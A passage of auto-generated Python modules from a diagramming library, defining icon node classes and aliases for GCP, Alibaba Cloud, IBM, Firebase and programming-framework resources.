"resources/gcp/api" class APIGateway(_API): _icon = "api-gateway.png" class Apigee(_API): _icon = "apigee.png" class Endpoints(_API): _icon = "endpoints.png" # Aliases File: diagrams/gcp/operations.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _GCP class _Operations(_GCP): _type = "operations" _icon_dir = "resources/gcp/operations" class Logging(_Operations): _icon = "logging.png" class Monitoring(_Operations): _icon = "monitoring.png" # Aliases File: diagrams/gcp/devtools.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _GCP class _Devtools(_GCP): _type = "devtools" _icon_dir = "resources/gcp/devtools" class Build(_Devtools): _icon = "build.png" class CodeForIntellij(_Devtools): _icon = "code-for-intellij.png" class Code(_Devtools): _icon = "code.png" class ContainerRegistry(_Devtools): _icon = "container-registry.png" class GradleAppEnginePlugin(_Devtools): _icon = "gradle-app-engine-plugin.png" class IdePlugins(_Devtools): _icon = "ide-plugins.png" class MavenAppEnginePlugin(_Devtools): _icon = "maven-app-engine-plugin.png" class Scheduler(_Devtools): _icon = "scheduler.png" class SDK(_Devtools): _icon = "sdk.png" class SourceRepositories(_Devtools): _icon = "source-repositories.png" class Tasks(_Devtools): _icon = "tasks.png" class TestLab(_Devtools): _icon = "test-lab.png" class ToolsForEclipse(_Devtools): _icon = "tools-for-eclipse.png" class ToolsForPowershell(_Devtools): _icon = "tools-for-powershell.png" class ToolsForVisualStudio(_Devtools): _icon = "tools-for-visual-studio.png" # Aliases GCR = ContainerRegistry File: diagrams/gcp/storage.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _GCP class _Storage(_GCP): _type = "storage" _icon_dir = "resources/gcp/storage" class Filestore(_Storage): _icon = "filestore.png" class PersistentDisk(_Storage): _icon = "persistent-disk.png" class Storage(_Storage): _icon = "storage.png" # Aliases GCS = Storage File: diagrams/gcp/network.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _GCP class _Network(_GCP): _type = "network" _icon_dir = "resources/gcp/network" class Armor(_Network): _icon = "armor.png" class CDN(_Network): _icon = "cdn.png" class DedicatedInterconnect(_Network): _icon = "dedicated-interconnect.png" class DNS(_Network): _icon = "dns.png" class ExternalIpAddresses(_Network): _icon = "external-ip-addresses.png" class FirewallRules(_Network): _icon = "firewall-rules.png" class LoadBalancing(_Network): _icon = "load-balancing.png" class NAT(_Network): _icon = "nat.png" class Network(_Network): _icon = "network.png" class PartnerInterconnect(_Network): _icon = "partner-interconnect.png" class PremiumNetworkTier(_Network): _icon = "premium-network-tier.png" class Router(_Network): _icon = "router.png" class Routes(_Network): _icon = "routes.png" class StandardNetworkTier(_Network): _icon = "standard-network-tier.png" class TrafficDirector(_Network): _icon = "traffic-director.png" class VirtualPrivateCloud(_Network): _icon = "virtual-private-cloud.png" class VPN(_Network): _icon = "vpn.png" # Aliases VPC = VirtualPrivateCloud File: diagrams/gcp/analytics.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _GCP class _Analytics(_GCP): _type = "analytics" _icon_dir = "resources/gcp/analytics" class Bigquery(_Analytics): _icon = "bigquery.png" class Composer(_Analytics): _icon = "composer.png" class DataCatalog(_Analytics): _icon = "data-catalog.png" class DataFusion(_Analytics): _icon = "data-fusion.png" class Dataflow(_Analytics): _icon = "dataflow.png" class Datalab(_Analytics): _icon = "datalab.png" class Dataprep(_Analytics): _icon = "dataprep.png" class Dataproc(_Analytics): _icon = "dataproc.png" class Genomics(_Analytics): _icon = "genomics.png" class Pubsub(_Analytics): _icon = "pubsub.png" # Aliases BigQuery = Bigquery PubSub = Pubsub File: diagrams/gcp/migration.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _GCP class _Migration(_GCP): _type = "migration" _icon_dir = "resources/gcp/migration" class TransferAppliance(_Migration): _icon = "transfer-appliance.png" # Aliases File: diagrams/gcp/iot.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _GCP class _Iot(_GCP): _type = "iot" _icon_dir = "resources/gcp/iot" class IotCore(_Iot): _icon = "iot-core.png" # Aliases File: diagrams/gcp/compute.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _GCP class _Compute(_GCP): _type = "compute" _icon_dir = "resources/gcp/compute" class AppEngine(_Compute): _icon = "app-engine.png" class ComputeEngine(_Compute): _icon = "compute-engine.png" class ContainerOptimizedOS(_Compute): _icon = "container-optimized-os.png" class Functions(_Compute): _icon = "functions.png" class GKEOnPrem(_Compute): _icon = "gke-on-prem.png" class GPU(_Compute): _icon = "gpu.png" class KubernetesEngine(_Compute): _icon = "kubernetes-engine.png" class Run(_Compute): _icon = "run.png" # Aliases GAE = AppEngine GCF = Functions GCE = ComputeEngine GKE = KubernetesEngine File: diagrams/alibabacloud/web.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _AlibabaCloud class _Web(_AlibabaCloud): _type = "web" _icon_dir = "resources/alibabacloud/web" class Dns(_Web): _icon = "dns.png" class Domain(_Web): _icon = "domain.png" # Aliases File: diagrams/alibabacloud/database.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _AlibabaCloud class _Database(_AlibabaCloud): _type = "database" _icon_dir = "resources/alibabacloud/database" class ApsaradbCassandra(_Database): _icon = "apsaradb-cassandra.png" class ApsaradbHbase(_Database): _icon = "apsaradb-hbase.png" class ApsaradbMemcache(_Database): _icon = "apsaradb-memcache.png" class ApsaradbMongodb(_Database): _icon = "apsaradb-mongodb.png" class ApsaradbOceanbase(_Database): _icon = "apsaradb-oceanbase.png" class ApsaradbPolardb(_Database): _icon = "apsaradb-polardb.png" class ApsaradbPostgresql(_Database): _icon = "apsaradb-postgresql.png" class ApsaradbPpas(_Database): _icon = "apsaradb-ppas.png" class ApsaradbRedis(_Database): _icon = "apsaradb-redis.png" class ApsaradbSqlserver(_Database): _icon = "apsaradb-sqlserver.png" class DataManagementService(_Database): _icon = "data-management-service.png" class DataTransmissionService(_Database): _icon = "data-transmission-service.png" class DatabaseBackupService(_Database): _icon = "database-backup-service.png" class DisributeRelationalDatabaseService(_Database): _icon = "disribute-relational-database-service.png" class GraphDatabaseService(_Database): _icon = "graph-database-service.png" class HybriddbForMysql(_Database): _icon = "hybriddb-for-mysql.png" class RelationalDatabaseService(_Database): _icon = "relational-database-service.png" # Aliases DMS = DataManagementService DTS = DataTransmissionService DBS = DatabaseBackupService DRDS = DisributeRelationalDatabaseService GDS = GraphDatabaseService RDS = RelationalDatabaseService File: diagrams/alibabacloud/security.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _AlibabaCloud class _Security(_AlibabaCloud): _type = "security" _icon_dir = "resources/alibabacloud/security" class AntiBotService(_Security): _icon = "anti-bot-service.png" class AntiDdosBasic(_Security): _icon = "anti-ddos-basic.png" class AntiDdosPro(_Security): _icon = "anti-ddos-pro.png" class AntifraudService(_Security): _icon = "antifraud-service.png" class BastionHost(_Security): _icon = "bastion-host.png" class CloudFirewall(_Security): _icon = "cloud-firewall.png" class CloudSecurityScanner(_Security): _icon = "cloud-security-scanner.png" class ContentModeration(_Security): _icon = "content-moderation.png" class CrowdsourcedSecurityTesting(_Security): _icon = "crowdsourced-security-testing.png" class DataEncryptionService(_Security): _icon = "data-encryption-service.png" class DbAudit(_Security): _icon = "db-audit.png" class GameShield(_Security): _icon = "game-shield.png" class IdVerification(_Security): _icon = "id-verification.png" class ManagedSecurityService(_Security): _icon = "managed-security-service.png" class SecurityCenter(_Security): _icon = "security-center.png" class ServerGuard(_Security): _icon = "server-guard.png" class SslCertificates(_Security): _icon = "ssl-certificates.png" class WebApplicationFirewall(_Security): _icon = "web-application-firewall.png" # Aliases ABS = AntiBotService AS = AntifraudService CFW = CloudFirewall CM = ContentModeration DES = DataEncryptionService WAF = WebApplicationFirewall File: diagrams/alibabacloud/__init__.py """ AlibabaCloud provides a set of services for Alibaba Cloud provider. """ from diagrams import Node class _AlibabaCloud(Node): _provider = "alibabacloud" _icon_dir = "resources/alibabacloud" fontcolor = "#ffffff" File: diagrams/alibabacloud/application.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _AlibabaCloud class _Application(_AlibabaCloud): _type = "application" _icon_dir = "resources/alibabacloud/application" class ApiGateway(_Application): _icon = "api-gateway.png" class BeeBot(_Application): _icon = "bee-bot.png" class BlockchainAsAService(_Application): _icon = "blockchain-as-a-service.png" class CloudCallCenter(_Application): _icon = "cloud-call-center.png" class CodePipeline(_Application): _icon = "code-pipeline.png" class DirectMail(_Application): _icon = "direct-mail.png" class LogService(_Application): _icon = "log-service.png" class MessageNotificationService(_Application): _icon = "message-notification-service.png" class NodeJsPerformancePlatform(_Application): _icon = "node-js-performance-platform.png" class OpenSearch(_Application): _icon = "open-search.png" class PerformanceTestingService(_Application): _icon = "performance-testing-service.png" class RdCloud(_Application): _icon = "rd-cloud.png" class SmartConversationAnalysis(_Application): _icon = "smart-conversation-analysis.png" class Yida(_Application): _icon = "yida.png" # Aliases SLS = LogService MNS = MessageNotificationService PTS = PerformanceTestingService SCA = SmartConversationAnalysis File: diagrams/alibabacloud/communication.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _AlibabaCloud class _Communication(_AlibabaCloud): _type = "communication" _icon_dir = "resources/alibabacloud/communication" class DirectMail(_Communication): _icon = "direct-mail.png" class MobilePush(_Communication): _icon = "mobile-push.png" # Aliases File: diagrams/alibabacloud/storage.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _AlibabaCloud class _Storage(_AlibabaCloud): _type = "storage" _icon_dir = "resources/alibabacloud/storage" class CloudStorageGateway(_Storage): _icon = "cloud-storage-gateway.png" class FileStorageHdfs(_Storage): _icon = "file-storage-hdfs.png" class FileStorageNas(_Storage): _icon = "file-storage-nas.png" class HybridBackupRecovery(_Storage): _icon = "hybrid-backup-recovery.png" class HybridCloudDisasterRecovery(_Storage): _icon = "hybrid-cloud-disaster-recovery.png" class Imm(_Storage): _icon = "imm.png" class ObjectStorageService(_Storage): _icon = "object-storage-service.png" class ObjectTableStore(_Storage): _icon = "object-table-store.png" # Aliases HDFS = FileStorageHdfs NAS = FileStorageNas HBR = HybridBackupRecovery HDR = HybridCloudDisasterRecovery OSS = ObjectStorageService OTS = ObjectTableStore File: diagrams/alibabacloud/network.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _AlibabaCloud class _Network(_AlibabaCloud): _type = "network" _icon_dir = "resources/alibabacloud/network" class Cdn(_Network): _icon = "cdn.png" class CloudEnterpriseNetwork(_Network): _icon = "cloud-enterprise-network.png" class ElasticIpAddress(_Network): _icon = "elastic-ip-address.png" class ExpressConnect(_Network): _icon = "express-connect.png" class NatGateway(_Network): _icon = "nat-gateway.png" class ServerLoadBalancer(_Network): _icon = "server-load-balancer.png" class SmartAccessGateway(_Network): _icon = "smart-access-gateway.png" class VirtualPrivateCloud(_Network): _icon = "virtual-private-cloud.png" class VpnGateway(_Network): _icon = "vpn-gateway.png" # Aliases CEN = CloudEnterpriseNetwork EIP = ElasticIpAddress SLB = ServerLoadBalancer VPC = VirtualPrivateCloud File: diagrams/alibabacloud/analytics.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _AlibabaCloud class _Analytics(_AlibabaCloud): _type = "analytics" _icon_dir = "resources/alibabacloud/analytics" class AnalyticDb(_Analytics): _icon = "analytic-db.png" class ClickHouse(_Analytics): _icon = "click-house.png" class DataLakeAnalytics(_Analytics): _icon = "data-lake-analytics.png" class ElaticMapReduce(_Analytics): _icon = "elatic-map-reduce.png" class OpenSearch(_Analytics): _icon = "open-search.png" # Aliases File: diagrams/alibabacloud/iot.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _AlibabaCloud class _Iot(_AlibabaCloud): _type = "iot" _icon_dir = "resources/alibabacloud/iot" class IotInternetDeviceId(_Iot): _icon = "iot-internet-device-id.png" class IotLinkWan(_Iot): _icon = "iot-link-wan.png" class IotMobileConnectionPackage(_Iot): _icon = "iot-mobile-connection-package.png" class IotPlatform(_Iot): _icon = "iot-platform.png" # Aliases File: diagrams/alibabacloud/compute.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _AlibabaCloud class _Compute(_AlibabaCloud): _type = "compute" _icon_dir = "resources/alibabacloud/compute" class AutoScaling(_Compute): _icon = "auto-scaling.png" class BatchCompute(_Compute): _icon = "batch-compute.png" class ContainerRegistry(_Compute): _icon = "container-registry.png" class ContainerService(_Compute): _icon = "container-service.png" class ElasticComputeService(_Compute): _icon = "elastic-compute-service.png" class ElasticContainerInstance(_Compute): _icon = "elastic-container-instance.png" class ElasticHighPerformanceComputing(_Compute): _icon = "elastic-high-performance-computing.png" class ElasticSearch(_Compute): _icon = "elastic-search.png" class FunctionCompute(_Compute): _icon = "function-compute.png" class OperationOrchestrationService(_Compute): _icon = "operation-orchestration-service.png" class ResourceOrchestrationService(_Compute): _icon = "resource-orchestration-service.png" class ServerLoadBalancer(_Compute): _icon = "server-load-balancer.png" class ServerlessAppEngine(_Compute): _icon = "serverless-app-engine.png" class SimpleApplicationServer(_Compute): _icon = "simple-application-server.png" class WebAppService(_Compute): _icon = "web-app-service.png" # Aliases ESS = AutoScaling ECS = ElasticComputeService ECI = ElasticContainerInstance EHPC = ElasticHighPerformanceComputing FC = FunctionCompute OOS = OperationOrchestrationService ROS = ResourceOrchestrationService SLB = ServerLoadBalancer SAE = ServerlessAppEngine SAS = SimpleApplicationServer WAS = WebAppService File: diagrams/ibm/user.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _IBM class _User(_IBM): _type = "user" _icon_dir = "resources/ibm/user" class Browser(_User): _icon = "browser.png" class Device(_User): _icon = "device.png" class IntegratedDigitalExperiences(_User): _icon = "integrated-digital-experiences.png" class PhysicalEntity(_User): _icon = "physical-entity.png" class Sensor(_User): _icon = "sensor.png" class User(_User): _icon = "user.png" # Aliases File: diagrams/ibm/social.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _IBM class _Social(_IBM): _type = "social" _icon_dir = "resources/ibm/social" class Communities(_Social): _icon = "communities.png" class FileSync(_Social): _icon = "file-sync.png" class LiveCollaboration(_Social): _icon = "live-collaboration.png" class Messaging(_Social): _icon = "messaging.png" class Networking(_Social): _icon = "networking.png" # Aliases File: diagrams/ibm/infrastructure.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _IBM class _Infrastructure(_IBM): _type = "infrastructure" _icon_dir = "resources/ibm/infrastructure" class Channels(_Infrastructure): _icon = "channels.png" class CloudMessaging(_Infrastructure): _icon = "cloud-messaging.png" class Dashboard(_Infrastructure): _icon = "dashboard.png" class Diagnostics(_Infrastructure): _icon = "diagnostics.png" class EdgeServices(_Infrastructure): _icon = "edge-services.png" class EnterpriseMessaging(_Infrastructure): _icon = "enterprise-messaging.png" class EventFeed(_Infrastructure): _icon = "event-feed.png" class InfrastructureServices(_Infrastructure): _icon = "infrastructure-services.png" class InterserviceCommunication(_Infrastructure): _icon = "interservice-communication.png" class LoadBalancingRouting(_Infrastructure): _icon = "load-balancing-routing.png" class MicroservicesMesh(_Infrastructure): _icon = "microservices-mesh.png" class MobileBackend(_Infrastructure): _icon = "mobile-backend.png" class MobileProviderNetwork(_Infrastructure): _icon = "mobile-provider-network.png" class MonitoringLogging(_Infrastructure): _icon = "monitoring-logging.png" class Monitoring(_Infrastructure): _icon = "monitoring.png" class PeerServices(_Infrastructure): _icon = "peer-services.png" class ServiceDiscoveryConfiguration(_Infrastructure): _icon = "service-discovery-configuration.png" class TransformationConnectivity(_Infrastructure): _icon = "transformation-connectivity.png" # Aliases File: diagrams/ibm/applications.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _IBM class _Applications(_IBM): _type = "applications" _icon_dir = "resources/ibm/applications" class ActionableInsight(_Applications): _icon = "actionable-insight.png" class Annotate(_Applications): _icon = "annotate.png" class ApiDeveloperPortal(_Applications): _icon = "api-developer-portal.png" class ApiPolyglotRuntimes(_Applications): _icon = "api-polyglot-runtimes.png" class AppServer(_Applications): _icon = "app-server.png" class ApplicationLogic(_Applications): _icon = "application-logic.png" class EnterpriseApplications(_Applications): _icon = "enterprise-applications.png" class Index(_Applications): _icon = "index.png" class IotApplication(_Applications): _icon = "iot-application.png" class Microservice(_Applications): _icon = "microservice.png" class MobileApp(_Applications): _icon = "mobile-app.png" class Ontology(_Applications): _icon = "ontology.png" class OpenSourceTools(_Applications): _icon = "open-source-tools.png" class RuntimeServices(_Applications): _icon = "runtime-services.png" class SaasApplications(_Applications): _icon = "saas-applications.png" class ServiceBroker(_Applications): _icon = "service-broker.png" class SpeechToText(_Applications): _icon = "speech-to-text.png" class VisualRecognition(_Applications): _icon = "visual-recognition.png" class Visualization(_Applications): _icon = "visualization.png" # Aliases File: diagrams/ibm/security.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _IBM class _Security(_IBM): _type = "security" _icon_dir = "resources/ibm/security" class ApiSecurity(_Security): _icon = "api-security.png" class BlockchainSecurityService(_Security): _icon = "blockchain-security-service.png" class DataSecurity(_Security): _icon = "data-security.png" class Firewall(_Security): _icon = "firewall.png" class Gateway(_Security): _icon = "gateway.png" class GovernanceRiskCompliance(_Security): _icon = "governance-risk-compliance.png" class IdentityAccessManagement(_Security): _icon = "identity-access-management.png" class IdentityProvider(_Security): _icon = "identity-provider.png" class InfrastructureSecurity(_Security): _icon = "infrastructure-security.png" class PhysicalSecurity(_Security): _icon = "physical-security.png" class SecurityMonitoringIntelligence(_Security): _icon = "security-monitoring-intelligence.png" class SecurityServices(_Security): _icon = "security-services.png" class TrustendComputing(_Security): _icon = "trustend-computing.png" class Vpn(_Security): _icon = "vpn.png" # Aliases File: diagrams/ibm/__init__.py """ IBM provides a set of services for IBM Cloud provider. """ from diagrams import Node class _IBM(Node): _provider = "ibm" _icon_dir = "resources/ibm" fontcolor = "#ffffff" File: diagrams/ibm/devops.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _IBM class _Devops(_IBM): _type = "devops" _icon_dir = "resources/ibm/devops" class ArtifactManagement(_Devops): _icon = "artifact-management.png" class BuildTest(_Devops): _icon = "build-test.png" class CodeEditor(_Devops): _icon = "code-editor.png" class CollaborativeDevelopment(_Devops): _icon = "collaborative-development.png" class ConfigurationManagement(_Devops): _icon = "configuration-management.png" class ContinuousDeploy(_Devops): _icon = "continuous-deploy.png" class ContinuousTesting(_Devops): _icon = "continuous-testing.png" class Devops(_Devops): _icon = "devops.png" class Provision(_Devops): _icon = "provision.png" class ReleaseManagement(_Devops): _icon = "release-management.png" # Aliases File: diagrams/ibm/storage.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _IBM class _Storage(_IBM): _type = "storage" _icon_dir = "resources/ibm/storage" class BlockStorage(_Storage): _icon = "block-storage.png" class ObjectStorage(_Storage): _icon = "object-storage.png" # Aliases File: diagrams/ibm/network.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _IBM class _Network(_IBM): _type = "network" _icon_dir = "resources/ibm/network" class Bridge(_Network): _icon = "bridge.png" class DirectLink(_Network): _icon = "direct-link.png" class Enterprise(_Network): _icon = "enterprise.png" class Firewall(_Network): _icon = "firewall.png" class FloatingIp(_Network): _icon = "floating-ip.png" class Gateway(_Network): _icon = "gateway.png" class InternetServices(_Network): _icon = "internet-services.png" class LoadBalancerListener(_Network): _icon = "load-balancer-listener.png" class LoadBalancerPool(_Network): _icon = "load-balancer-pool.png" class LoadBalancer(_Network): _icon = "load-balancer.png" class LoadBalancingRouting(_Network): _icon = "load-balancing-routing.png" class PublicGateway(_Network): _icon = "public-gateway.png" class Region(_Network): _icon = "region.png" class Router(_Network): _icon = "router.png" class Rules(_Network): _icon = "rules.png" class Subnet(_Network): _icon = "subnet.png" class TransitGateway(_Network): _icon = "transit-gateway.png" class Vpc(_Network): _icon = "vpc.png" class VpnConnection(_Network): _icon = "vpn-connection.png" class VpnGateway(_Network): _icon = "vpn-gateway.png" class VpnPolicy(_Network): _icon = "vpn-policy.png" # Aliases File: diagrams/ibm/management.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _IBM class _Management(_IBM): _type = "management" _icon_dir = "resources/ibm/management" class AlertNotification(_Management): _icon = "alert-notification.png" class ApiManagement(_Management): _icon = "api-management.png" class CloudManagement(_Management): _icon = "cloud-management.png" class ClusterManagement(_Management): _icon = "cluster-management.png" class ContentManagement(_Management): _icon = "content-management.png" class DataServices(_Management): _icon = "data-services.png" class DeviceManagement(_Management): _icon = "device-management.png" class InformationGovernance(_Management): _icon = "information-governance.png" class ItServiceManagement(_Management): _icon = "it-service-management.png" class Management(_Management): _icon = "management.png" class MonitoringMetrics(_Management): _icon = "monitoring-metrics.png" class ProcessManagement(_Management): _icon = "process-management.png" class ProviderCloudPortalService(_Management): _icon = "provider-cloud-portal-service.png" class PushNotifications(_Management): _icon = "push-notifications.png" class ServiceManagementTools(_Management): _icon = "service-management-tools.png" # Aliases File: diagrams/ibm/blockchain.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _IBM class _Blockchain(_IBM): _type = "blockchain" _icon_dir = "resources/ibm/blockchain" class BlockchainDeveloper(_Blockchain): _icon = "blockchain-developer.png" class Blockchain(_Blockchain): _icon = "blockchain.png" class CertificateAuthority(_Blockchain): _icon = "certificate-authority.png" class ClientApplication(_Blockchain): _icon = "client-application.png" class Communication(_Blockchain): _icon = "communication.png" class Consensus(_Blockchain): _icon = "consensus.png" class EventListener(_Blockchain): _icon = "event-listener.png" class Event(_Blockchain): _icon = "event.png" class ExistingEnterpriseSystems(_Blockchain): _icon = "existing-enterprise-systems.png" class HyperledgerFabric(_Blockchain): _icon = "hyperledger-fabric.png" class KeyManagement(_Blockchain): _icon = "key-management.png" class Ledger(_Blockchain): _icon = "ledger.png" class MembershipServicesProviderApi(_Blockchain): _icon = "membership-services-provider-api.png" class Membership(_Blockchain): _icon = "membership.png" class MessageBus(_Blockchain): _icon = "message-bus.png" class Node(_Blockchain): _icon = "node.png" class Services(_Blockchain): _icon = "services.png" class SmartContract(_Blockchain): _icon = "smart-contract.png" class TransactionManager(_Blockchain): _icon = "transaction-manager.png" class Wallet(_Blockchain): _icon = "wallet.png" # Aliases File: diagrams/ibm/analytics.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _IBM class _Analytics(_IBM): _type = "analytics" _icon_dir = "resources/ibm/analytics" class Analytics(_Analytics): _icon = "analytics.png" class DataIntegration(_Analytics): _icon = "data-integration.png" class DataRepositories(_Analytics): _icon = "data-repositories.png" class DeviceAnalytics(_Analytics): _icon = "device-analytics.png" class StreamingComputing(_Analytics): _icon = "streaming-computing.png" # Aliases File: diagrams/ibm/data.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _IBM class _Data(_IBM): _type = "data" _icon_dir = "resources/ibm/data" class Caches(_Data): _icon = "caches.png" class Cloud(_Data): _icon = "cloud.png" class ConversationTrainedDeployed(_Data): _icon = "conversation-trained-deployed.png" class DataServices(_Data): _icon = "data-services.png" class DataSources(_Data): _icon = "data-sources.png" class DeviceIdentityService(_Data): _icon = "device-identity-service.png" class DeviceRegistry(_Data): _icon = "device-registry.png" class EnterpriseData(_Data): _icon = "enterprise-data.png" class EnterpriseUserDirectory(_Data): _icon = "enterprise-user-directory.png" class FileRepository(_Data): _icon = "file-repository.png" class GroundTruth(_Data): _icon = "ground-truth.png" class Model(_Data): _icon = "model.png" class TmsDataInterface(_Data): _icon = "tms-data-interface.png" # Aliases File: diagrams/ibm/general.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _IBM class _General(_IBM): _type = "general" _icon_dir = "resources/ibm/general" class CloudMessaging(_General): _icon = "cloud-messaging.png" class CloudServices(_General): _icon = "cloud-services.png" class Cloudant(_General): _icon = "cloudant.png" class CognitiveServices(_General): _icon = "cognitive-services.png" class DataSecurity(_General): _icon = "data-security.png" class Enterprise(_General): _icon = "enterprise.png" class GovernanceRiskCompliance(_General): _icon = "governance-risk-compliance.png" class IBMContainers(_General): _icon = "ibm-containers.png" class IBMPublicCloud(_General): _icon = "ibm-public-cloud.png" class IdentityAccessManagement(_General): _icon = "identity-access-management.png" class IdentityProvider(_General): _icon = "identity-provider.png" class InfrastructureSecurity(_General): _icon = "infrastructure-security.png" class Internet(_General): _icon = "internet.png" class IotCloud(_General): _icon = "iot-cloud.png" class MicroservicesApplication(_General): _icon = "microservices-application.png" class MicroservicesMesh(_General): _icon = "microservices-mesh.png" class MonitoringLogging(_General): _icon = "monitoring-logging.png" class Monitoring(_General): _icon = "monitoring.png" class ObjectStorage(_General): _icon = "object-storage.png" class OfflineCapabilities(_General): _icon = "offline-capabilities.png" class Openwhisk(_General): _icon = "openwhisk.png" class PeerCloud(_General): _icon = "peer-cloud.png" class RetrieveRank(_General): _icon = "retrieve-rank.png" class Scalable(_General): _icon = "scalable.png" class ServiceDiscoveryConfiguration(_General): _icon = "service-discovery-configuration.png" class TextToSpeech(_General): _icon = "text-to-speech.png" class TransformationConnectivity(_General): _icon = "transformation-connectivity.png" # Aliases File: diagrams/ibm/compute.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _IBM class _Compute(_IBM): _type = "compute" _icon_dir = "resources/ibm/compute" class BareMetalServer(_Compute): _icon = "bare-metal-server.png" class ImageService(_Compute): _icon = "image-service.png" class Instance(_Compute): _icon = "instance.png" class Key(_Compute): _icon = "key.png" class PowerInstance(_Compute): _icon = "power-instance.png" # Aliases File: diagrams/firebase/extentions.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _Firebase class _Extentions(_Firebase): _type = "extentions" _icon_dir = "resources/firebase/extentions" class Extensions(_Extentions): _icon = "extensions.png" # Aliases File: diagrams/firebase/grow.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _Firebase class _Grow(_Firebase): _type = "grow" _icon_dir = "resources/firebase/grow" class ABTesting(_Grow): _icon = "ab-testing.png" class AppIndexing(_Grow): _icon = "app-indexing.png" class DynamicLinks(_Grow): _icon = "dynamic-links.png" class InAppMessaging(_Grow): _icon = "in-app-messaging.png" class Invites(_Grow): _icon = "invites.png" class Messaging(_Grow): _icon = "messaging.png" class Predictions(_Grow): _icon = "predictions.png" class RemoteConfig(_Grow): _icon = "remote-config.png" # Aliases FCM = Messaging File: diagrams/firebase/__init__.py """ Firebase provides a set of services for Firebase provider. """ from diagrams import Node class _Firebase(Node): _provider = "firebase" _icon_dir = "resources/firebase" fontcolor = "#ffffff" File: diagrams/firebase/develop.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _Firebase class _Develop(_Firebase): _type = "develop" _icon_dir = "resources/firebase/develop" class Authentication(_Develop): _icon = "authentication.png" class Firestore(_Develop): _icon = "firestore.png" class Functions(_Develop): _icon = "functions.png" class Hosting(_Develop): _icon = "hosting.png" class MLKit(_Develop): _icon = "ml-kit.png" class RealtimeDatabase(_Develop): _icon = "realtime-database.png" class Storage(_Develop): _icon = "storage.png" # Aliases File: diagrams/firebase/quality.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _Firebase class _Quality(_Firebase): _type = "quality" _icon_dir = "resources/firebase/quality" class AppDistribution(_Quality): _icon = "app-distribution.png" class CrashReporting(_Quality): _icon = "crash-reporting.png" class Crashlytics(_Quality): _icon = "crashlytics.png" class PerformanceMonitoring(_Quality): _icon = "performance-monitoring.png" class TestLab(_Quality): _icon = "test-lab.png" # Aliases File: diagrams/firebase/base.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _Firebase class _Base(_Firebase): _type = "base" _icon_dir = "resources/firebase/base" class Firebase(_Base): _icon = "firebase.png" # Aliases File: diagrams/programming/framework.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _Programming class _Framework(_Programming): _type = "framework" _icon_dir = "resources/programming/framework" class Angular(_Framework): _icon = "angular.png" class Backbone(_Framework): _icon = "backbone.png" class Django(_Framework): _icon = "django.png" class Ember(_Framework): _icon = "ember.png" class Fastapi(_Framework): _icon = "fastapi.png" class Flask(_Framework): _icon = "flask.png" class Flutter(_Framework): _icon = "flutter.png" class Graphql(_Framework): _icon = "graphql.png" class Laravel(_Framework): _icon = "laravel.png" class Micronaut(_Framework): _icon = "micronaut.png" class Quarkus(_Framework): _icon = "quarkus.png" class Rails(_Framework): _icon = "rails.png" class React(_Framework): _icon = "react.png" class Spring(_Framework): _icon = "spring.png" class Starlette(_Framework): _icon = "starlette.png" class Svelte(_Framework): _icon = "svelte.png" class Vue(_Framework): _icon = "vue.png" # Aliases FastAPI = Fastapi GraphQL = Graphql File: diagrams/programming/__init__.py """ Programming provides a set of programming languages and frameworks. """ from diagrams import Node class _Programming(Node): _provider = "programming" _icon_dir = "resources/programming" fontcolor = "#ffffff" File: diagrams/programming/flowchart.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _Programming class _Flowchart(_Programming): _type = "flowchart" _icon_dir = "resources/programming/flowchart" class Action(_Flowchart): _icon = "action.png" class Collate(_Flowchart): _icon = "collate.png" class Database(_Flowchart): _icon = "database.png" class Decision(_Flowchart): _icon = "decision.png" class Delay(_Flowchart): _icon = "delay.png" class Display(_Flowchart): _icon = "display.png" class Document(_Flowchart): _icon = "document.png" class InputOutput(_Flowchart): _icon = "input-output.png" class Inspection(_Flowchart): _icon = "inspection.png" class InternalStorage(_Flowchart): _icon = "internal-storage.png" class LoopLimit(_Flowchart): _icon = "loop-limit.png" class ManualInput(_Flowchart): _icon = "manual-input.png" class ManualLoop(_Flowchart): _icon = "manual-loop.png" class Merge(_Flowchart): _icon = "merge.png" class MultipleDocuments(_Flowchart): _icon = "multiple-documents.png" class OffPageConnectorLeft(_Flowchart): _icon = "off-page-connector-left.png" class OffPageConnectorRight(_Flowchart): _icon = "off-page-connector-right.png" class Or(_Flowchart): _icon = "or.png" 